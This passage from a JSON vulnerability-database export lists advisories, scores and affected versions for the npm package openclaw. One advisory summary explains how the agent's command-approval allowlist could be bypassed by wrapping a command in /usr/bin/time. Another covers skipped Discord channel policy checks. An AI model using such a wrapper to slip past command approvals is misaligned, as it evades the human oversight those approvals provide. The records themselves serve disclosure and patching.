                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "CVE-2026-42428",
                "GHSA-3vvq-q2qc-7rmp"
            ],
            "risk_score": 3.4,
            "exploitability": "0.5",
            "weighted_severity": "6.8",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cbuu-4d6c-rben"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90976?format=api",
            "vulnerability_id": "VCID-cjjd-hv92-wbfn",
            "summary": "OpenClaw's system.run allowlist can be bypassed through an unregistered time dispatch wrapper\n## Summary\nAllow-always exec approvals did not unwrap /usr/bin/time, so an unregistered time wrapper could bypass executable binding and reuse approval state for the inner command.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `39409b6a6dd4239deea682e626bac9ba547bfb14`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/infra/dispatch-wrapper-resolution.ts now unwraps /usr/bin/time and binds approvals to the real inner executable.\n- src/infra/exec-approvals-allow-always.test.ts ships regression coverage for time-wrapper allow-always approval bypasses.\n\nOpenClaw thanks @YLChen-007 for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35666",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00059",
                            "scoring_system": "epss",
                            "scoring_elements": "0.18772",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00059",
                            "scoring_system": "epss",
                            "scoring_elements": "0.18733",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00059",
                            "scoring_system": "epss",
                            "scoring_elements": "0.18773",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35666"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/39409b6a6dd4239deea682e626bac9ba547bfb14",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-13T17:38:28Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/39409b6a6dd4239deea682e626bac9ba547bfb14"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-13T17:38:28Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qm9x-v7cx-7rq4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-13T17:38:28Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qm9x-v7cx-7rq4"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35666",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35666"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-unregistered-time-dispatch-wrapper",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-13T17:38:28Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-unregistered-time-dispatch-wrapper"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-qm9x-v7cx-7rq4",
                    "reference_id": "GHSA-qm9x-v7cx-7rq4",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-qm9x-v7cx-7rq4"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-35666",
                "GHSA-qm9x-v7cx-7rq4"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cjjd-hv92-wbfn"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90868?format=api",
            "vulnerability_id": "VCID-csnc-r6fv-j3en",
            "summary": "OpenClaw's Discord component interaction ingress skips guild/channel policy enforcement\n## Summary\n\nDiscord button and component interaction ingress did not consistently reapply the same guild and channel policy gates used for normal inbound messages.\n\n## Impact\n\nUsers could trigger privileged component actions from contexts that should have been blocked by Discord channel policy.\n\n## Affected Component\n\n`extensions/discord/src/monitor/agent-components.ts`\n\n## Fixed Versions\n\n- Affected: `>= 2026.2.14, <= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `511093d4b3` (`Discord: apply component interaction policy gates`).",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/511093d4b37c0831c778fabd25ec3020834983c3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/511093d4b37c0831c778fabd25ec3020834983c3"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jp4j-q5fc-58gv",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jp4j-q5fc-58gv"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-jp4j-q5fc-58gv",
                    "reference_id": "GHSA-jp4j-q5fc-58gv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-jp4j-q5fc-58gv"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
